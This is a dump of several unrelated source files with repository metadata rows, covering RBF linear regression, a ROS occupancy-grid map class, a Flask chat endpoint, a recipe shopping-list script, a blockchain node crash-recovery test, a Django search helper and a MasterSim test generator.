for x_vector in x_matrix:
var_array=np.add(var_array,np.power(np.subtract(x_vector,mu_vector),2))
var_array=np.divide(var_array,n*len(x_matrix))
var_matrix=[]
for i in range(0,len(var_array)):
temp=[]
for j in range(0,len(var_array)):
if(i==j):
if(var_array[i]==0):
temp.append(0.0000000000000001)
else:
temp.append(var_array[i])
else:
temp.append(0)
var_matrix.append(temp)
return inv(np.array(var_matrix))
def get_inv_var_matrix(x_matrix, mu_matrix,n):
inv_var_matrix=[]
for mu_vector in mu_matrix:
inv_var_matrix.append(getInverseVariance(x_matrix,mu_vector,n))
return inv_var_matrix
def phi_x(x_vector, mu_matrix, inv_var_matrix_vector):
result=[]
for i in range(0,len(mu_matrix)+1):
if i==0:
result.append(1)
else:
x_transpose=np.transpose(np.subtract(x_vector,mu_matrix[i-1]))
temp=np.dot(inv_var_matrix_vector[i-1],x_transpose)
temp=np.dot(np.subtract(x_vector,mu_matrix[i-1]),temp)
temp=(-0.5)*temp
temp=math.exp(temp)
result.append(temp)
return result
def phi(x_matrix, mu_matrix, inv_var_matrix):
phi_matrix=[]
for x_vector in x_matrix:
phi_matrix.append(phi_x(x_vector,mu_matrix,inv_var_matrix))
return phi_matrix
def delta_w(eta, e_delta):
return np.dot(-eta,e_delta)
def delta_e(e_d, e_w, lamb):
return np.add(e_d, np.dot(lamb,e_w))
def delta_e_d(target, weight_vector, phi_x_n):
phi_x_n_t=np.transpose(phi_x_n)
temp=np.dot(weight_vector,phi_x_n_t)
temp=np.subtract(target,temp)
temp=np.dot(temp,-1)
temp=np.dot(temp,phi_x_n)
return temp
def delta_e_w(weight_vector):
return weight_vector
def find_w_star(phi_matrix, lamb, target_vector):
phi_transpose=np.transpose(phi_matrix)
temp=np.dot(phi_transpose,phi_matrix)
temp=np.add(np.dot(lamb,np.identity(len(phi_transpose))),temp)
temp=inv(temp)
temp=np.dot(temp,np.dot(phi_transpose,target_vector))
return temp
def closedFormTrain(x_matrix,target_vector,clusterNum,n,lamb):
x=vq.kmeans(np.array(x_matrix),clusterNum-1)
mu_matrix=x[0]
sigma_matrix=get_inv_var_matrix(x_matrix, mu_matrix,n)
phi_matrix=phi(x_matrix,mu_matrix,sigma_matrix)
w_star = find_w_star(phi_matrix,lamb=0.1, target_vector=target_vector)
return [w_star,mu_matrix,sigma_matrix]
def stochasticTrain(x_matrix,target_vector,clusterNum,n,lamb,eta,threshold):
w_temp=[]
temp=[]
x=vq.kmeans(np.array(x_matrix),clusterNum-1)
mu_matrix=x[0]
sigma_matrix=get_inv_var_matrix(x_matrix, mu_matrix,n)
for i in range(0,clusterNum):
w_temp.append(random.random())
prevMax=1
for i in range(0,len(x_matrix)):
phi_vector=phi_x(x_matrix[i],mu_matrix,sigma_matrix)
e_d=delta_e_d(target_vector[i],w_temp,phi_vector)
d_e=delta_e(e_d,w_temp,lamb)
temp.append(d_e)
if(i%10==0):
temp=np.mean(temp,axis=0)
w_d=delta_w(eta,temp)
max_w=w_d[0]
w_temp=np.add(w_temp,w_d)
temp=[]
for each in w_d:
if(max_w<each):
max_w=each
if(math.fabs(max_w)<threshold):
break
return [w_temp,mu_matrix,sigma_matrix]
def calcError(phi_vector,target,w_star,lamb):
err=(target - np.dot(w_star,np.transpose(phi_vector)))**2 + lamb*np.dot(w_star,np.transpose(w_star))
return math.sqrt(err)
def validationError(x_matrix,target_vector,w_star,lamb, mu_matrix, sigma_matrix):
const=lamb*np.dot(w_star,np.transpose(w_star))
err=0
for i in range(0,len(x_matrix)):
err=err+(target_vector[i] - np.dot(w_star,np.transpose(phi_x(x_matrix[i],mu_matrix,sigma_matrix))))**2
return math.sqrt(err/len(x_matrix))
def testError(x_matrix,target_vector,w_star, lamb,mu_matrix, sigma_matrix):
const=lamb*np.dot(w_star,np.transpose(w_star))
err=0
for i in range(0,len(x_matrix)):
err=err+(target_vector[i] - np.dot(w_star,np.transpose(phi_x(x_matrix[i],mu_matrix,sigma_matrix))))**2
return math.sqrt(err/len(x_matrix))
#Loading Data from Input CSV Files(Synthetic Dataset)
x_matrix=[]
target_vector=[]
with open('input.csv', 'rU') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
temp=[]
for item in row:
temp.append(float(item))
x_matrix.append(temp)
with open('output.csv', 'rU') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
for item in row:
target_vector.append(float(item))
synthetic_part = partition(x_matrix,target_vector)
#Loading Data from Input CSV Files(Learning to Rank Dataset)
x_matrix=[]
target_vector=[]
with open('Querylevelnorm_X.csv', 'rU') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
temp=[]
for item in row:
temp.append(float(item))
x_matrix.append(temp)
with open('Querylevelnorm_t.csv', 'rU') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
for item in row:
target_vector.append(float(item))
part = partition(x_matrix,target_vector)
#Real World Data Set
clusterNum=17
lamb=0
eta=0.1
threshold=0.001
print("-----------LeToR Dataset-----------")
print
#Closed Form Solution
print("---CLOSED FORM SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
newTrainResult = closedFormTrain(part.training['x_matrix'],part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=0)
newErr=validationError(part.training['x_matrix'],part.training['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(part.validation['x_matrix'],part.validation['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(part.testing['x_matrix'],part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Stocastic Gradient Descent
print("---SGD SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
print('Eta : '+str(eta))
newTrainResult = stochasticTrain(part.training['x_matrix'],part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=lamb, eta=eta, threshold=threshold)
newErr=validationError(part.training['x_matrix'],part.training['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(part.validation['x_matrix'],part.validation['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(part.testing['x_matrix'],part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Synthetic Data Set
clusterNum=8
lamb=0.2
eta=1
threshold=0.0001
print("-----------Synthetic Dataset-----------")
print
#Closed Form Solution
print("---CLOSED FORM SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
newTrainResult = closedFormTrain(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=0)
newErr=validationError(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(synthetic_part.validation['x_matrix'],synthetic_part.validation['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(synthetic_part.testing['x_matrix'],synthetic_part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Stocastic Gradient Descent
lamb=0
print("---SGD SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
print('Eta : '+str(eta))
newTrainResult = stochasticTrain(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=lamb, eta=eta, threshold=threshold)
newErr=validationError(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(synthetic_part.validation['x_matrix'],synthetic_part.validation['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(synthetic_part.testing['x_matrix'],synthetic_part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
| [
"krypton@Viveks-MBP.fios-router.home"
] | krypton@Viveks-MBP.fios-router.home |
aa29fd60858618da98f9bfe475b87bbcae300e96 | 2a7fb0ec4f3be86ec24bb8754229eaec8fff7141 | /random_nav/map_utils.py | c0abbd918aec640969db4cc33325449195eb27ab | [] | no_license | JMU-ROBOTICS-VIVA/random_nav_summer_expt | af4c479d64f753488f496655e05d8385cd70cfac | a9cbb1e491e015cb8f81d46005bc0472bdd493c8 | refs/heads/master | 2022-11-22T01:24:38.943973 | 2020-07-27T17:03:15 | 2020-07-27T17:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,710 | py | #!/usr/bin/env python
"""
Map class that can generate and read OccupancyGrid messages.
Author: Nathan Sprague
Version: 2/14/19
"""
import numpy as np
import rclpy
from nav_msgs.msg import OccupancyGrid
from geometry_msgs.msg import Pose, Quaternion, Point
class Map(object):
""" The Map class represents an occupancy grid.
Map entries are stored as 8-bit integers.
Public instance variables:
width -- Number of columns in the occupancy grid.
height -- Number of rows in the occupancy grid.
resolution -- Width of each grid square in meters.
origin_x -- Position of the grid cell (0,0) in
origin_y -- in the map coordinate system.
grid -- numpy array with height rows and width columns.
Note that x increases with increasing column number and y increases
with increasing row number.
"""
def __init__(self, *args, **kwargs):
""" Construct an empty occupancy grid.
Can be called -either- with a single OccupancyGrid message as
the argument, or with any of the following provided as named
arguments:
keyword arguments:
origin_x,
origin_y -- The position of grid cell (0,0) in the
map coordinate frame. (default -2.5, -2.5)
resolution-- width and height of the grid cells
in meters. (default .1)
width,
height -- The grid will have height rows and width
columns cells. width is the size of
the x-dimension and height is the size
of the y-dimension. (default 50, 50)
The default arguments put (0,0) in the center of the grid.
"""
if len(args) == 1 and isinstance(args[0], OccupancyGrid):
self._init_from_message(args[0])
elif len(args) == 0:
self._init_empty(kwargs)
else:
raise ValueError("Constructor only supports named arguments.")
def _init_empty(self, kwargs):
""" Set up an empty map using keyword arguments. """
self.origin_x = kwargs.get('origin_x', -2.5)
self.origin_y = kwargs.get('origin_y', -2.5)
self.width = kwargs.get('width', 50)
self.height = kwargs.get('height', 50)
self.resolution = kwargs.get('resolution', .1)
self._init_numpy_grid()
def _init_from_message(self, map_message):
"""
Set up a map as an in-memory version of an OccupancyGrid message
"""
self.width = map_message.info.width
self.height = map_message.info.height
self.resolution = map_message.info.resolution
self.origin_x = map_message.info.origin.position.x
self.origin_y = map_message.info.origin.position.y
self.grid = self._data_to_numpy(map_message.data)
def _init_numpy_grid(self):
"""
Initialize a default numpy array.
"""
self.grid = np.zeros((self.height, self.width))
def _numpy_to_data(self):
"""
Convert the numpy array containing grid data to a python
list suitable for use as the data field in an OccupancyGrid
message.
"""
return list(self.grid.reshape((self.grid.size,)))
def _data_to_numpy(self, data):
"""
Convert the integer data field in an OccupancyGrid message to
a numpy array.
"""
return np.array(data, dtype='int8').reshape(self.height, self.width)
def to_message(self):
""" Return a nav_msgs/OccupancyGrid representation of this map. """
grid_msg = OccupancyGrid()
grid_msg.header.stamp = rclpy.timer.Clock.now()
grid_msg.header.frame_id = "map"
grid_msg.info.resolution = self.resolution
grid_msg.info.width = self.width
grid_msg.info.height = self.height
grid_msg.info.origin = Pose(Point(self.origin_x, self.origin_y, 0),
Quaternion(0, 0, 0, 1))
grid_msg.data = self._numpy_to_data()
return grid_msg
def cell_position(self, row, col):
"""
Determine the x, y cooridantes of the center of a particular grid cell.
"""
x = row * self.resolution + .5 * self.resolution + self.origin_x
y = col * self.resolution + .5 * self.resolution + self.origin_y
return x, y
def cell_index(self, x, y):
"""
Helper method for finding map index. x and y are in the map
coordinate system.
"""
x -= self.origin_x
y -= self.origin_y
row = int(np.floor(y / self.resolution))
col = int(np.floor(x / self.resolution))
return row, col
def set_cell(self, x, y, val):
"""
Set the value in the grid cell containing position (x,y).
x and y are in the map coordinate system. No effect if (x,y)
is out of bounds.
"""
row, col = self.cell_index(x, y)
try:
if row >= 0 and col >= 0:
self.grid[row, col] = val
except IndexError:
pass
def get_cell(self, x, y):
"""
Get the value from the grid cell containing position (x,y).
x and y are in the map coordinate system. Return 'nan' if
(x,y) is out of bounds.
"""
row, col = self.cell_index(x, y)
try:
if row >= 0 and col >= 0:
return self.grid[row, col]
else:
return float('nan')
except IndexError:
return float('nan')
| [
"noitsnotmridul@gmail.com"
] | noitsnotmridul@gmail.com |
824b982e5971777c7f478481c050559850dd8baa | aada3c89a69d3d24bd1526b60edefb7a17766fce | /serv/chats.py | 144a6d823cb8cea0cd13b0e2ade6102ca6fd8c25 | [] | no_license | liuyang9643/AI_toy | d67530a2ba89f725417ab30ef6494c40cc0a530e | dfb1f939aeecc591c318e4e49c3de9ff7328a068 | refs/heads/main | 2023-05-13T16:06:53.862771 | 2021-06-04T11:26:33 | 2021-06-04T11:26:33 | 373,808,200 | 0 | 0 | null | 2021-06-04T11:26:34 | 2021-06-04T10:38:53 | Python | UTF-8 | Python | false | false | 2,085 | py | import time
from bson import ObjectId
from flask import Blueprint, jsonify, request
from setting import MongoDB, RET
from baidu_ai import text2audio
from redis_msg import get_redis_msg, get_redis_msg_app
chat = Blueprint("chat", __name__)
# 获取聊天信息列表
@chat.route("/chat_list", methods=["POST"])
def chat_list():
chat_info = request.form.to_dict()
chat_window = MongoDB.chats.find_one({"_id": ObjectId(chat_info.get("chat_id"))})
get_redis_msg_app(chat_info.get("sender"), chat_info.get("receiver"))
RET["code"] = 0
RET["msg"] = "查询聊天记录"
RET["data"] = chat_window.get("chat_list")
return jsonify(RET)
# 接收消息
@chat.route("/recv_msg", methods=["POST"])
def recv_msg():
# 查询聊天窗口
chat_info = request.form.to_dict()
# 获取当前sender receiver 的未读或离线消息
sender, count = get_redis_msg(chat_info.get("sender"), chat_info.get("receiver"))
chat_window = MongoDB.chats.find_one({"user_list": {"$all": [sender, chat_info.get("receiver")]}})
if count != 0:
chat_one = chat_window.get("chat_list")[-count:] # type:list
chat_one.reverse()
remark = "陌人生"
toy = MongoDB.toys.find_one({"_id": ObjectId(chat_info.get("receiver"))})
for friend in toy.get("friend_list"):
if friend.get("friend_id") == sender:
remark = friend.get("friend_remark")
xxtx = text2audio(f"以下是来自{remark}的消息")
xxtx_dict = {
"sender": sender,
"receiver": chat_info.get("receiver"),
"chat": xxtx,
"createTime": time.time()
}
chat_one.append(xxtx_dict)
return jsonify(chat_one)
else:
xxtx = text2audio(f"你还没有收到消息哦")
xxtx_dict = {
"sender": "ai",
"receiver": chat_info.get("receiver"),
"chat": xxtx,
"createTime": time.time()
}
return jsonify([xxtx_dict])
| [
"1019798260@qq.com"
] | 1019798260@qq.com |
92d200c82f3f0e1c236dd751dfc38a84ec6d134f | d2b87736df0717de07b2940d25ef8125bc709965 | /CookBook.py | 56d36a8a0ddad932efb8e2eb653b02706f01e9a7 | [] | no_license | AlexP-1/CookBook | 358e8061db9d94ee6b54b97373e579abf6aa70b5 | 81d856dc0ffe9d51f7353b371a2871880ba37dc8 | refs/heads/master | 2022-07-07T02:39:59.336589 | 2020-05-20T19:02:43 | 2020-05-20T19:02:43 | 265,644,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | from pprint import pprint
def create_book(book_name):
with open('cook.txt', encoding='UTF-8') as fi:
cook_dict = {}
for line in fi:
dish_name = line.strip()
cook_dict[dish_name] = []
counter = int(fi.readline().strip())
for i in range(counter):
ingredients = fi.readline().strip().split('|')
temp_dict = {'ingredient_name': ingredients[0], 'quantity': ingredients[1], 'measure': ingredients[2]}
cook_dict[dish_name].append(temp_dict)
fi.readline()
return cook_dict
def get_shop_list_by_dishes(dishes, persons):
cook_dict = create_book('cook.txt')
shoplist = {}
for dish_name in dishes:
if dish_name in cook_dict:
for ingredients in cook_dict[dish_name]:
if ingredients['ingredient_name'] in shoplist:
shoplist[ingredients['ingredient_name']]['quantity'] += int((ingredients['quantity']) * persons)
else:
shoplist[ingredients['ingredient_name']] = {'measure': ingredients['measure'],
'quantity': int(ingredients['quantity']) * persons}
return shoplist
| [
"panyushkin91@mail.ru"
] | panyushkin91@mail.ru |
cca894e770a3e8d3ac6e03569334283372f9d669 | 352e8838240161fbd421943a568fe9624167585a | /test/functional/dbcrash.py | 068e9e27ac06fc49254ef5d86ccbc4fda399afcc | [
"MIT"
] | permissive | starshipcoin/starshipsha | 3e405753796275cf8944a4e84109bd7936eb0996 | 7d7e2764c00a3dc4af08d77f175ffffc98c0c780 | refs/heads/master | 2020-03-27T05:06:38.919129 | 2018-08-24T13:25:04 | 2018-08-24T13:25:04 | 145,994,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,440 | py | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test recovery from a crash during chainstate writing.
- 4 nodes
* node0, node1, and node2 will have different dbcrash ratios, and different
dbcache sizes
* node3 will be a regular node, with no crashing.
* The nodes will not connect to each other.
- use default test framework starting chain. initialize starting_tip_height to
tip height.
- Main loop:
* generate lots of transactions on node3, enough to fill up a block.
* uniformly randomly pick a tip height from starting_tip_height to
tip_height; with probability 1/(height_difference+4), invalidate this block.
* mine enough blocks to overtake tip_height at start of loop.
* for each node in [node0,node1,node2]:
- for each mined block:
* submit block to node
* if node crashed on/after submitting:
- restart until recovery succeeds
- check that utxo matches node3 using gettxoutsetinfo"""
import errno
import http.client
import random
import sys
import time
from test_framework.mininode import *
from test_framework.script import *
from test_framework.test_framework import StarshipshaTestFramework
from test_framework.util import *
HTTP_DISCONNECT_ERRORS = [http.client.CannotSendRequest]
try:
HTTP_DISCONNECT_ERRORS.append(http.client.RemoteDisconnected)
except AttributeError:
pass
class ChainstateWriteCrashTest(StarshipshaTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = False
# Set -maxmempool=0 to turn off mempool memory sharing with dbcache
# Set -rpcservertimeout=900 to reduce socket disconnects in this
# long-running test
self.base_args = ["-limitdescendantsize=0", "-maxmempool=0", "-rpcservertimeout=900", "-dbbatchsize=200000"]
# Set different crash ratios and cache sizes. Note that not all of
# -dbcache goes to pcoinsTip.
self.node0_args = ["-dbcrashratio=8", "-dbcache=4"] + self.base_args
self.node1_args = ["-dbcrashratio=16", "-dbcache=8"] + self.base_args
self.node2_args = ["-dbcrashratio=24", "-dbcache=16"] + self.base_args
# Node3 is a normal node with default args, except will mine full blocks
self.node3_args = ["-blockmaxweight=4000000"]
self.extra_args = [self.node0_args, self.node1_args, self.node2_args, self.node3_args]
def setup_network(self):
# Need a bit of extra time for the nodes to start up for this test
self.add_nodes(self.num_nodes, extra_args=self.extra_args, timewait=90)
self.start_nodes()
# Leave them unconnected, we'll use submitblock directly in this test
def restart_node(self, node_index, expected_tip):
"""Start up a given node id, wait for the tip to reach the given block hash, and calculate the utxo hash.
Exceptions on startup should indicate node crash (due to -dbcrashratio), in which case we try again. Give up
after 60 seconds. Returns the utxo hash of the given node."""
time_start = time.time()
while time.time() - time_start < 120:
try:
# Any of these RPC calls could throw due to node crash
self.start_node(node_index)
self.nodes[node_index].waitforblock(expected_tip)
utxo_hash = self.nodes[node_index].gettxoutsetinfo()['hash_serialized_2']
return utxo_hash
except:
# An exception here should mean the node is about to crash.
# If starshipshad exits, then try again. wait_for_node_exit()
# should raise an exception if starshipshad doesn't exit.
self.wait_for_node_exit(node_index, timeout=10)
self.crashed_on_restart += 1
time.sleep(1)
# If we got here, starshipshad isn't coming back up on restart. Could be a
# bug in starshipshad, or we've gotten unlucky with our dbcrash ratio --
# perhaps we generated a test case that blew up our cache?
# TODO: If this happens a lot, we should try to restart without -dbcrashratio
# and make sure that recovery happens.
raise AssertionError("Unable to successfully restart node %d in allotted time", node_index)
def submit_block_catch_error(self, node_index, block):
"""Try submitting a block to the given node.
Catch any exceptions that indicate the node has crashed.
Returns true if the block was submitted successfully; false otherwise."""
try:
self.nodes[node_index].submitblock(block)
return True
except http.client.BadStatusLine as e:
# Prior to 3.5 BadStatusLine('') was raised for a remote disconnect error.
if sys.version_info[0] == 3 and sys.version_info[1] < 5 and e.line == "''":
self.log.debug("node %d submitblock raised exception: %s", node_index, e)
return False
else:
raise
except tuple(HTTP_DISCONNECT_ERRORS) as e:
self.log.debug("node %d submitblock raised exception: %s", node_index, e)
return False
except OSError as e:
self.log.debug("node %d submitblock raised OSError exception: errno=%s", node_index, e.errno)
if e.errno in [errno.EPIPE, errno.ECONNREFUSED, errno.ECONNRESET]:
# The node has likely crashed
return False
else:
# Unexpected exception, raise
raise
def sync_node3blocks(self, block_hashes):
"""Use submitblock to sync node3's chain with the other nodes
If submitblock fails, restart the node and get the new utxo hash.
If any nodes crash while updating, we'll compare utxo hashes to
ensure recovery was successful."""
node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
# Retrieve all the blocks from node3
blocks = []
for block_hash in block_hashes:
blocks.append([block_hash, self.nodes[3].getblock(block_hash, 0)])
# Deliver each block to each other node
for i in range(3):
nodei_utxo_hash = None
self.log.debug("Syncing blocks to node %d", i)
for (block_hash, block) in blocks:
# Get the block from node3, and submit to node_i
self.log.debug("submitting block %s", block_hash)
if not self.submit_block_catch_error(i, block):
# TODO: more carefully check that the crash is due to -dbcrashratio
# (change the exit code perhaps, and check that here?)
self.wait_for_node_exit(i, timeout=30)
self.log.debug("Restarting node %d after block hash %s", i, block_hash)
nodei_utxo_hash = self.restart_node(i, block_hash)
assert nodei_utxo_hash is not None
self.restart_counts[i] += 1
else:
# Clear it out after successful submitblock calls -- the cached
# utxo hash will no longer be correct
nodei_utxo_hash = None
# Check that the utxo hash matches node3's utxo set
# NOTE: we only check the utxo set if we had to restart the node
# after the last block submitted:
# - checking the utxo hash causes a cache flush, which we don't
# want to do every time; so
# - we only update the utxo cache after a node restart, since flushing
# the cache is a no-op at that point
if nodei_utxo_hash is not None:
self.log.debug("Checking txoutsetinfo matches for node %d", i)
assert_equal(nodei_utxo_hash, node3_utxo_hash)
def verify_utxo_hash(self):
"""Verify that the utxo hash of each node matches node3.
Restart any nodes that crash while querying."""
node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
self.log.info("Verifying utxo hash matches for all nodes")
for i in range(3):
try:
nodei_utxo_hash = self.nodes[i].gettxoutsetinfo()['hash_serialized_2']
except OSError:
# probably a crash on db flushing
nodei_utxo_hash = self.restart_node(i, self.nodes[3].getbestblockhash())
assert_equal(nodei_utxo_hash, node3_utxo_hash)
def generate_small_transactions(self, node, count, utxo_list):
FEE = 1000 # TODO: replace this with node relay fee based calculation
num_transactions = 0
random.shuffle(utxo_list)
while len(utxo_list) >= 2 and num_transactions < count:
tx = CTransaction()
input_amount = 0
for i in range(2):
utxo = utxo_list.pop()
tx.vin.append(CTxIn(COutPoint(int(utxo['txid'], 16), utxo['vout'])))
input_amount += int(utxo['amount'] * COIN)
output_amount = (input_amount - FEE) // 3
if output_amount <= 0:
# Sanity check -- if we chose inputs that are too small, skip
continue
for i in range(3):
tx.vout.append(CTxOut(output_amount, hex_str_to_bytes(utxo['scriptPubKey'])))
# Sign and send the transaction to get into the mempool
tx_signed_hex = node.signrawtransaction(ToHex(tx))['hex']
node.sendrawtransaction(tx_signed_hex)
num_transactions += 1
def run_test(self):
# Track test coverage statistics
self.restart_counts = [0, 0, 0] # Track the restarts for nodes 0-2
self.crashed_on_restart = 0 # Track count of crashes during recovery
# Start by creating a lot of utxos on node3
initial_height = self.nodes[3].getblockcount()
utxo_list = create_confirmed_utxos(self.nodes[3].getnetworkinfo()['relayfee'], self.nodes[3], 5000)
self.log.info("Prepped %d utxo entries", len(utxo_list))
# Sync these blocks with the other nodes
block_hashes_to_sync = []
for height in range(initial_height + 1, self.nodes[3].getblockcount() + 1):
block_hashes_to_sync.append(self.nodes[3].getblockhash(height))
self.log.debug("Syncing %d blocks with other nodes", len(block_hashes_to_sync))
# Syncing the blocks could cause nodes to crash, so the test begins here.
self.sync_node3blocks(block_hashes_to_sync)
starting_tip_height = self.nodes[3].getblockcount()
# Main test loop:
# each time through the loop, generate a bunch of transactions,
# and then either mine a single new block on the tip, or some-sized reorg.
for i in range(40):
self.log.info("Iteration %d, generating 2500 transactions %s", i, self.restart_counts)
# Generate a bunch of small-ish transactions
self.generate_small_transactions(self.nodes[3], 2500, utxo_list)
# Pick a random block between current tip, and starting tip
current_height = self.nodes[3].getblockcount()
random_height = random.randint(starting_tip_height, current_height)
self.log.debug("At height %d, considering height %d", current_height, random_height)
if random_height > starting_tip_height:
# Randomly reorg from this point with some probability (1/4 for
# tip, 1/5 for tip-1, ...)
if random.random() < 1.0 / (current_height + 4 - random_height):
self.log.debug("Invalidating block at height %d", random_height)
self.nodes[3].invalidateblock(self.nodes[3].getblockhash(random_height))
# Now generate new blocks until we pass the old tip height
self.log.debug("Mining longer tip")
block_hashes = []
while current_height + 1 > self.nodes[3].getblockcount():
block_hashes.extend(self.nodes[3].generate(min(10, current_height + 1 - self.nodes[3].getblockcount())))
self.log.debug("Syncing %d new blocks...", len(block_hashes))
self.sync_node3blocks(block_hashes)
utxo_list = self.nodes[3].listunspent()
self.log.debug("Node3 utxo count: %d", len(utxo_list))
# Check that the utxo hashes agree with node3
# Useful side effect: each utxo cache gets flushed here, so that we
# won't get crashes on shutdown at the end of the test.
self.verify_utxo_hash()
# Check the test coverage
self.log.info("Restarted nodes: %s; crashes on restart: %d", self.restart_counts, self.crashed_on_restart)
# If no nodes were restarted, we didn't test anything.
assert self.restart_counts != [0, 0, 0]
# Make sure we tested the case of crash-during-recovery.
assert self.crashed_on_restart > 0
# Warn if any of the nodes escaped restart.
for i in range(3):
if self.restart_counts[i] == 0:
self.log.warn("Node %d never crashed during utxo flush!", i)
if __name__ == "__main__":
ChainstateWriteCrashTest().main()
| [
"khryptor@starshipcoin.com"
] | khryptor@starshipcoin.com |
c174a2e44b99cb6349ff944069b1b602555b46c7 | 892c35f72f46f145c3f3860c1c29f1f4503ef9a6 | /search/search.py | fb2fa2520ad49d842fb5e069fbe0011cfdf4eb90 | [] | no_license | pymmrd/tuangou | aaa2b857e352f75f2ba0aa024d2880a6adac21a8 | 8f6a35dde214e809cdd6cbfebd8d913bafd68fb2 | refs/heads/master | 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | import re
import string
from django.db.models import Q
from django.conf import settings
from tuangou.search.models import SearchTerm
from tuangou.stats.utils import stats
from tuangou.utils.location import get_current_city
def store(request, q):
#if search term is at least three chars long, store in db
if len(q) >= 2:
tracking_id = stats.tracking_id(request)
terms = SearchTerm.objects.filter(tracking_id=tracking_id, q=q).count()
if not terms:
term = SearchTerm()
term.q = q
term.tracking_id = stats.tracking_id(request)
term.ip_address = request.META.get('REMOTE_ADDR')
term.user = None
if request.user.is_authenticated():
term.user = request.user
term.save()
# get deals matching the search text
def deals(request, search_text):
from tuangou.guider.models import ReDeal
city = request.session.get('city', None)
deals = ReDeal.nonexpires.all()
results = {}
results['deals'] = {}
for word in search_text:
deals = deals.filter(Q(title__contains=word)|
Q(division__name__contains=word))
results['deals'] = deals[:settings.DEAL_PER_ROW]
return results
| [
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] | zg163@zg163-Lenovo-IdeaPad-Y470.(none) |
f0f6ee583c0fbd31d8ee142af619d661daa1f4be | d613fdf2a0881b9749b8c0af40c178e5a1756c7f | /cross-check/scripts/generate_mastersim_projects.py | fb15363ad744363477dcbb799db2708fa3a1a0b1 | [] | no_license | mazbrili/mastersim | 07840c7f8320b48f8e12304c2627f74d95552c19 | 1b948471474659518c78c3886bd1aff51610e2b5 | refs/heads/master | 2022-12-11T21:58:06.379519 | 2020-04-23T10:26:50 | 2020-04-23T10:26:50 | 294,000,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,116 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Cross-check helper script, generates MasterSim project files and imports required files.
Copyright 2019, Andreas Nicolai <andreas.nicolai@gmx.net>
Run this script from within a directory that contains the content of the 'fmi-cross-check' github repository.
Script will create a subdirectory 'msim' within it will create for each test fmu another subdirectory.
Use the command line arguments to filter out unneeded test cases.
If a subdirectory already exists, it will be skipped and a warning will be printed.
> python generate_mastersim_projects.py [-t <tool>] [-v 1|2] [-p <platform>] <fmi-directory>
Arguments:
-t <tool> Which tool/vendor (basically the subdirectory name) to use; use all if omitted
-v 1|2 Use either version 1 or 2 of the standard; use all if omitted
-p <platform> Platform (win64, darwin64, linux64); use all if omitted
Example:
> generate_mastersim_projects.py -v 1 -p linux64
Will process all test cases within directory:
fmi-cross-check/fmus/1.0/cs/linux64/*
"""
import os
import platform
import argparse
import csv
import MasterSimTestGenerator as msimGenerator
FMI_CROSS_CHECK_DIRECTORY = "fmi-cross-check"
MSIM_DIRECTORY = "msim"
# *** main program ***
# command line arguments
parser = argparse.ArgumentParser(description="Runs cross-check tests for MasterSim")
parser.add_argument('-t', action="store", dest="tool", help="Tool/vendor directory to process")
parser.add_argument('-v', action="store", dest="fmiVersion", help="FMI version to use.")
parser.add_argument('-p', action="store", dest="platform", help="Platform (win64, darwin64, linux64).")
args = parser.parse_args()
fullPath = os.path.abspath(FMI_CROSS_CHECK_DIRECTORY)
fullPath = fullPath.replace('\\', '/') # windows fix
fullPathParts = fullPath.split('/')
# check if directory exists
